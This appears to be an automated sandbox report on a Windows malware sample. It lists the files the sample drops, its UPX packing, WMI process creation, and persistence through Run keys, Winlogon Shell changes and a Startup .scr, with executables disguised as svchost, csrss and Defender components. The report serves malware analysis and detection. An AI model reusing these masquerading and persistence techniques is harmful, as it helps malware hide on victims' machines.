                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA88F0E push r12; ret 4_2_00007FFDFAA88F35
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86D06 push r12; ret 4_2_00007FFDFAA86D08
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA8A2F5 push rsp; retf 4_2_00007FFDFAA8A2F6
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86CFA push rdx; ret 4_2_00007FFDFAA86D01
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA892F4 push r10; retf 4_2_00007FFDFAA89360
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86EE0 push r12; ret 4_2_00007FFDFAA86EFE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86F42 push r12; ret 4_2_00007FFDFAA86F5A
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86E9C push rsp; iretd 4_2_00007FFDFAA86E9D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA88E76 push rbp; iretq 4_2_00007FFDFAA88E77
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86CDC push r8; ret 4_2_00007FFDFAA86CE9
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86EC6 push r10; retf 4_2_00007FFDFAA86EC9
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA8A4B9 push rdx; ret 4_2_00007FFDFAA8A510
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA86EAB push rsi; ret 4_2_00007FFDFAA86EAC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA89C12 push rsp; retf 4_2_00007FFDFAA89C13
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\sNdMsyHA.logJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\jLnWNQxJ.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\etRnODSa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\itfeGmlQ.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\nQMnEjGz.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\wPQtSLGm.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\rar.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\sTOcLgQt.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\sqlite3.dllJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\VmdPWrri.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\flhVkUrV.logJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dllJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\JmBJbHgR.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\JryrolxS.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\qBrDLwRs.logJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\RXtRpjXE.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\libssl-1_1.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\jHNEqIuO.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\oXnVlCHH.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\tcMmcUQx.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\tKFUOyWv.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\JSejfBbH.logJump to dropped file
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files\Windows Defender\en-US\based.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\QYTGHhqw.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\SUVZKjmy.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\djIfBqMY.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\python310.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\bmTftlYf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\MZFQQyWG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\ifKwJWCS.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\GLhaJjhM.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\cACFdGgc.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\pUOdHCWB.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\EqAsTbqX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Windows\Prefetch\HpQPPZazcv.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\XWHGkwkl.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\vIRlNZYv.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\xiBLBWku.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\xnytOABw.logJump to dropped file
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\libffi-7.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\KWThvPSL.logJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\xGttiZnp.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\LXhZiUrJ.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\BLFrfvoX.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\AwjkpWnj.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Recovery\powershell.exeJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\FuissdNI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\IsmZtopJ.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\hwDWkmWW.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\eGaXQvvb.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Recovery\HpQPPZazcv.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\ViDyzjon.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\VuNhAaSo.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66642\select.pydJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\wYntCyZj.logJump to dropped file
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Windows\Prefetch\HpQPPZazcv.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\xnytOABw.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\vIRlNZYv.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\bmTftlYf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\AwjkpWnj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\xGttiZnp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\etRnODSa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\KWThvPSL.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\JryrolxS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\hwDWkmWW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\flhVkUrV.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\MZFQQyWG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\cACFdGgc.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\itfeGmlQ.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\wPQtSLGm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\sTOcLgQt.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\QYTGHhqw.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\XWHGkwkl.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\IsmZtopJ.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\jHNEqIuO.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\wYntCyZj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\ViDyzjon.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\BLFrfvoX.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\xiBLBWku.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\sNdMsyHA.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\ifKwJWCS.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\RXtRpjXE.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\oXnVlCHH.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\djIfBqMY.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\LXhZiUrJ.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\tKFUOyWv.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\SUVZKjmy.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\JmBJbHgR.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\pUOdHCWB.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\EqAsTbqX.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\eGaXQvvb.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\tcMmcUQx.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\VuNhAaSo.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\jLnWNQxJ.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\GLhaJjhM.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\VmdPWrri.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\JSejfBbH.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\qBrDLwRs.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\nQMnEjGz.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeFile created: C:\Users\user\Desktop\FuissdNI.logJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run based
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scrJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scrJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
